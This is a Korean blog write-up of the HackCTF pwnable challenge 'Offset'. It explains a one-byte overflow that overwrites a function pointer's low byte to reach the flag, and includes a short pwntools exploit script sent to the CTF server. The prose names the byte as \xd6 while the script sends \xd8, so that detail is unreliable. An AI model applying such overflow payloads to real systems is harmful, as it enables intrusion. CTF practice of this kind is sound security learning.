본문 바로가기

HackCTF/pwnable

HackCTF - Offset

 

이번에는 PIE가 걸려있다

 

main

gets 함수가 쓰이긴하는데 중요하지 않다

 

select_func

함수 이름부터 수상하다

 

strcmp 로 1바이트 오버플로우가 발생한다

 

gdb 로 strcmp 까지 확인해보면

 

빨간칸에 있는게 30개이고 나머지 한 바이트를 \xd6으로 바꾸면 0x56555600이 0x565556d6으로 

바껴 플래그가 출력 될 것이다

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3007)
e = ELF('offset')

payload = 'a'*30
payload += '\xd8'

r.sendline(payload)

r.interactive()

'HackCTF > pwnable' 카테고리의 다른 글

HackCTF - Yes or no  (0) 2021.11.21
HackCTF - BOF_PIE  (0) 2021.11.21
HackCTF - Simple_Overflow_ver_2  (0) 2021.11.21
HackCTF - x64 Simple_size_BOF  (0) 2021.11.21
HackCTF - x64 Buffer Overflow  (0) 2021.11.21